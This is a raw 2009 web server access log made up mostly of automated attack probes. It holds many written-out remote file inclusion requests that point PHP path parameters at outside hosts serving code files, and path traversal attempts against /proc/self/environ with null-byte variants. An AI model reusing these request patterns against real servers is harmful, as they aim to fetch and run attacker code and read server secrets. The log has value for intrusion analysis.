151.1.153.1 - - [17/Jul/2009:01:54:48 -0400] "GET /logs/error_log.Q109060900//components/com_smf/smf.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
151.1.153.1 - - [17/Jul/2009:01:54:48 -0400] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
151.1.153.1 - - [17/Jul/2009:01:54:49 -0400] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
151.1.153.1 - - [17/Jul/2009:01:55:55 -0400] "GET /logs/access_log.Q109070500//components/com_smf/smf.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
216.169.96.27 - - [17/Jul/2009:01:56:03 -0400] "GET //include/bbs.lib.inc.php?site_path=http://aboutav.com/id1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
216.169.96.27 - - [17/Jul/2009:01:56:04 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://aboutav.com/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.169.96.27 - - [17/Jul/2009:01:56:04 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://aboutav.com/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
216.169.96.27 - - [17/Jul/2009:01:56:12 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://aboutav.com/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.169.96.27 - - [17/Jul/2009:01:56:12 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://aboutav.com/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
216.169.96.27 - - [17/Jul/2009:01:56:13 -0400] "GET //include/bbs.lib.inc.php?site_path=http://aboutav.com/id1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:01:56:26 -0400] "GET /logs//admin/index.php?o=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:01:56:26 -0400] "GET /logs/access_log.Q109051800//admin/index.php?o=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:01:56:29 -0400] "GET //admin/index.php?o=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:01:56:32 -0400] "GET //admin/index.php?o=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:01:56:33 -0400] "GET /logs/access_log.Q109051800//admin/index.php?o=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:01:56:33 -0400] "GET /logs//admin/index.php?o=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
216.169.96.27 - - [17/Jul/2009:01:56:36 -0400] "GET /logs/error_log.Q109052800//include/bbs.lib.inc.php?site_path=http://aboutav.com/id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
216.169.96.27 - - [17/Jul/2009:01:56:42 -0400] "GET /logs/error_log.Q109052800//include/bbs.lib.inc.php?site_path=http://aboutav.com/id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
211.230.156.161 - - [17/Jul/2009:01:56:46 -0400] "GET /logs/access_log.Q109070200%20%20/ncaster/admin/addons/archive/archive.php?adminfolder=http://aboutav.com//id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
66.11.230.36 - - [17/Jul/2009:01:57:19 -0400] "GET /logs//include.php?path[docroot]=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
66.11.230.36 - - [17/Jul/2009:01:57:19 -0400] "GET /logs/access_log.Q109051800%20%20//include.php?path[docroot]=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.11.230.36 - - [17/Jul/2009:01:57:19 -0400] "GET //include.php?path[docroot]=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
66.11.230.36 - - [17/Jul/2009:01:57:25 -0400] "GET /logs/access_log.Q109053100%20%20//include.php?path[docroot]=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
213.198.76.196 - - [17/Jul/2009:01:57:30 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.nakjimadang.com/ams/amboard/upload/ec.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
213.198.76.196 - - [17/Jul/2009:01:57:30 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.nakjimadang.com/ams/amboard/upload/ec.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.65"
213.198.76.196 - - [17/Jul/2009:01:57:31 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.nakjimadang.com/ams/amboard/upload/ec.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.65"
114.200.199.144 - - [17/Jul/2009:01:57:32 -0400] "GET /logs//ashnews.php?pathtoashnews=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:01:57:32 -0400] "GET /logs/access_log.Q109071100%20%20//ashnews.php?pathtoashnews=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:01:57:32 -0400] "GET //ashnews.php?pathtoashnews=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:01:57:40 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:01:57:40 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:01:57:40 -0400] "GET /logs/access_log.Q109070700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
213.198.76.196 - - [17/Jul/2009:01:57:43 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.nakjimadang.com/ams/amboard/upload/ec.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
213.198.76.196 - - [17/Jul/2009:01:57:44 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.nakjimadang.com/ams/amboard/upload/ec.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.65"
213.198.76.196 - - [17/Jul/2009:01:57:44 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.nakjimadang.com/ams/amboard/upload/ec.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.65"
58.227.193.198 - - [17/Jul/2009:01:57:49 -0400] "GET /logs/access_log.Q109062200%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:01:58:05 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:01:58:05 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:01:58:05 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:01:58:09 -0400] "GET /logs/access_log.Q109061000//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jul/2009:01:58:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.230.156.161 - - [17/Jul/2009:01:58:34 -0400] "GET /logs/access_log.Q109070600%20%20/ncaster/admin/addons/archive/archive.php?adminfolder=http://aboutav.com//id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
58.227.193.198 - - [17/Jul/2009:01:59:10 -0400] "GET /logs/access_log.Q109052400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:01:59:28 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:01:59:28 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:01:59:28 -0400] "GET /logs/access_log.Q109061000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:01:59:31 -0400] "GET /logs/error_log.Q109070700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
71.93.147.198 - - [17/Jul/2009:01:59:52 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 125946 "-" "Outlook-Express/7.0 (MSIE 7.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Tablet PC 2.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618; TmstmpExt)"
210.205.57.2 - - [17/Jul/2009:01:59:54 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.nakjimadang.com/ams/amboard/upload/satu.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
210.205.57.2 - - [17/Jul/2009:01:59:54 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.nakjimadang.com/ams/amboard/upload/satu.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
210.205.57.2 - - [17/Jul/2009:01:59:54 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.nakjimadang.com/ams/amboard/upload/satu.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Jul/2009:02:00:03 -0400] "GET /logs/access_log.Q109060100//bbs//skin/ggambo7002_board/write.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:02:00:32 -0400] "GET /logs/access_log.Q109071100//ashnews.php?pathtoashnews=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.169.96.27 - - [17/Jul/2009:02:02:02 -0400] "GET /logs/access_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://aboutav.com/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.169.96.27 - - [17/Jul/2009:02:02:06 -0400] "GET /logs/access_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://aboutav.com/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.169.96.27 - - [17/Jul/2009:02:02:15 -0400] "GET /logs/error_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://aboutav.com/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
213.198.76.196 - - [17/Jul/2009:02:02:19 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://www.nakjimadang.com/ams/amboard/upload/ec.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
213.198.76.196 - - [17/Jul/2009:02:02:22 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://www.nakjimadang.com/ams/amboard/upload/ec.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
216.169.96.27 - - [17/Jul/2009:02:02:23 -0400] "GET /logs/error_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://aboutav.com/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.230.156.161 - - [17/Jul/2009:02:03:13 -0400] "GET /logs/access_log.Q109051300/ncaster/admin/addons/archive/archive.php?adminfolder=http://aboutav.com//id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jul/2009:02:03:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
119.93.90.155 - - [17/Jul/2009:02:03:35 -0400] "GET /logs/access_log.Q109062700/senetman/html/index.php?page=http://id1.fileave.com/id1.txt.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
66.11.230.36 - - [17/Jul/2009:02:03:51 -0400] "GET /logs/access_log.Q109051800//include.php?path[docroot]=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.11.230.36 - - [17/Jul/2009:02:03:52 -0400] "GET /logs/access_log.Q109053100//include.php?path[docroot]=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:02:03:56 -0400] "GET /logs/access_log.Q109051800%20%20//admin/index.php?o=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:02:03:56 -0400] "GET /logs//admin/index.php?o=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:02:03:56 -0400] "GET //admin/index.php?o=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:02:04:03 -0400] "GET //admin/index.php?o=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:02:04:03 -0400] "GET /logs//admin/index.php?o=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:02:04:04 -0400] "GET /logs/access_log.Q109051800%20%20//admin/index.php?o=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
119.93.90.155 - - [17/Jul/2009:02:04:31 -0400] "GET /logs/access_log.Q109062700/senetman/html/index.php?page=http://id1.fileave.com/id1.txt.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:02:06:12 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.233.37.180 - - [17/Jul/2009:02:06:28 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.unifiedcustomerinteraction.com//components/com_joomlalib/standalone/cmss/yes.txt??%0D?? HTTP/1.1" 404 265 "-" "libwww-perl/5.65"
211.233.37.180 - - [17/Jul/2009:02:06:28 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.unifiedcustomerinteraction.com//components/com_joomlalib/standalone/cmss/yes.txt??%0D?? HTTP/1.1" 404 287 "-" "libwww-perl/5.65"
211.233.37.180 - - [17/Jul/2009:02:06:28 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.unifiedcustomerinteraction.com//components/com_joomlalib/standalone/cmss/yes.txt??%0D?? HTTP/1.1" 404 260 "-" "libwww-perl/5.65"
211.233.37.180 - - [17/Jul/2009:02:06:30 -0400] "GET /logs/access_log.Q109052000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.unifiedcustomerinteraction.com//components/com_joomlalib/standalone/cmss/yes.txt??%0D?? HTTP/1.1" 404 287 "-" "libwww-perl/5.65"
219.117.207.76 - - [17/Jul/2009:02:06:56 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://piffopuff.se/images/stories/test.txt??? HTTP/1.1" 404 242 "-" "Mozilla/4.61 [en] (OS/2; U)"
219.117.207.76 - - [17/Jul/2009:02:07:18 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://piffopuff.se/images/stories/test.txt??? HTTP/1.1" 404 247 "-" "Mozilla/4.61 [en] (OS/2; U)"
166.205.130.158 - - [17/Jul/2009:02:08:05 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 125946 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko)"
209.59.12.99 - - [17/Jul/2009:02:08:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.145.31.242 - - [17/Jul/2009:02:09:45 -0400] "GET /logs/access_log.Q109051400//autolinks/al_initialize.php?alpath=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 253 "-" "Avant Browser (http://www.avantbrowser.com)"
218.145.31.242 - - [17/Jul/2009:02:09:45 -0400] "GET /logs/access_log.Q109051100//autolinks/al_initialize.php?alpath=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 253 "-" "Avant Browser (http://www.avantbrowser.com)"
218.145.31.242 - - [17/Jul/2009:02:09:46 -0400] "GET /logs/access_log.Q109051400/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
218.145.31.242 - - [17/Jul/2009:02:09:46 -0400] "GET /logs/access_log.Q109051100/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
218.145.31.242 - - [17/Jul/2009:02:09:46 -0400] "GET /logs/access_log.Q109051400//autolinks/al_initialize.php?alpath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 253 "-" "XXXXXX"
218.145.31.242 - - [17/Jul/2009:02:09:46 -0400] "GET /logs/access_log.Q109051100//autolinks/al_initialize.php?alpath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 253 "-" "XXXXXX"
218.145.31.242 - - [17/Jul/2009:02:09:47 -0400] "GET /logs/access_log.Q109051400//autolinks/al_initialize.php?alpath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 253 "-" "XXXXXX"
218.145.31.242 - - [17/Jul/2009:02:09:47 -0400] "GET /logs/access_log.Q109051100//autolinks/al_initialize.php?alpath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 253 "-" "XXXXXX"
91.89.182.104 - - [17/Jul/2009:02:10:42 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 125946 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
91.89.182.104 - - [17/Jul/2009:02:10:43 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 125946 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
85.153.6.44 - - [17/Jul/2009:02:11:59 -0400] "GET /logs/access_log.Q109052900/index.php?inhalt=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
85.153.6.44 - - [17/Jul/2009:02:12:00 -0400] "GET /logs/access_log.Q109052900/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
85.153.6.44 - - [17/Jul/2009:02:12:00 -0400] "GET /logs/access_log.Q109052900/index.php?inhalt=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 234 "-" "XXXXXX"
85.153.6.44 - - [17/Jul/2009:02:12:00 -0400] "GET /logs/access_log.Q109052900/index.php?inhalt=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "XXXXXX"
85.153.6.44 - - [17/Jul/2009:02:12:28 -0400] "GET /index.php?inhalt=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
85.153.6.44 - - [17/Jul/2009:02:12:28 -0400] "GET /logs/index.php?inhalt=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
85.153.6.44 - - [17/Jul/2009:02:12:29 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
85.153.6.44 - - [17/Jul/2009:02:12:29 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
85.153.6.44 - - [17/Jul/2009:02:12:29 -0400] "GET /index.php?inhalt=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 207 "-" "XXXXXX"
85.153.6.44 - - [17/Jul/2009:02:12:29 -0400] "GET /logs/index.php?inhalt=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 212 "-" "XXXXXX"
85.153.6.44 - - [17/Jul/2009:02:12:29 -0400] "GET /index.php?inhalt=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "XXXXXX"
85.153.6.44 - - [17/Jul/2009:02:12:29 -0400] "GET /logs/index.php?inhalt=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "XXXXXX"
209.59.12.99 - - [17/Jul/2009:02:13:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
79.174.68.88 - - [17/Jul/2009:02:13:59 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:02:13:59 -0400] "GET /logs/access_log.Q109051100%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:02:13:59 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 200 9866 "-" "Mozilla/5.0"
85.153.6.44 - - [17/Jul/2009:02:14:29 -0400] "GET /logs/access_log.Q109061300/index.php?inhalt=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
85.153.6.44 - - [17/Jul/2009:02:14:29 -0400] "GET /logs/access_log.Q109061300/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
85.153.6.44 - - [17/Jul/2009:02:14:30 -0400] "GET /logs/access_log.Q109061300/index.php?inhalt=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 234 "-" "XXXXXX"
85.153.6.44 - - [17/Jul/2009:02:14:30 -0400] "GET /logs/access_log.Q109061300/index.php?inhalt=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "XXXXXX"
85.153.6.44 - - [17/Jul/2009:02:15:22 -0400] "GET //plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
85.153.6.44 - - [17/Jul/2009:02:15:22 -0400] "GET /logs//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
85.153.6.44 - - [17/Jul/2009:02:15:22 -0400] "GET /logs/access_log.Q109052900//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 267 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
85.153.6.44 - - [17/Jul/2009:02:15:22 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
85.153.6.44 - - [17/Jul/2009:02:15:22 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
85.153.6.44 - - [17/Jul/2009:02:15:23 -0400] "GET /logs/access_log.Q109052900/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
85.153.6.44 - - [17/Jul/2009:02:15:23 -0400] "GET //plugins/spamx/BlackList.Examine.class.php?_CONF[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 240 "-" "XXXXXX"
85.153.6.44 - - [17/Jul/2009:02:15:23 -0400] "GET /logs//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 245 "-" "XXXXXX"
85.153.6.44 - - [17/Jul/2009:02:15:23 -0400] "GET /logs/access_log.Q109052900//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 267 "-" "XXXXXX"
85.153.6.44 - - [17/Jul/2009:02:15:23 -0400] "GET //plugins/spamx/BlackList.Examine.class.php?_CONF[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 240 "-" "XXXXXX"
85.153.6.44 - - [17/Jul/2009:02:15:23 -0400] "GET /logs//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 245 "-" "XXXXXX"
85.153.6.44 - - [17/Jul/2009:02:15:23 -0400] "GET /logs/access_log.Q109052900//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 267 "-" "XXXXXX"
206.225.23.4 - - [17/Jul/2009:02:15:26 -0400] "GET /logs/popup.php?path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:15:26 -0400] "GET /popup.php?path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
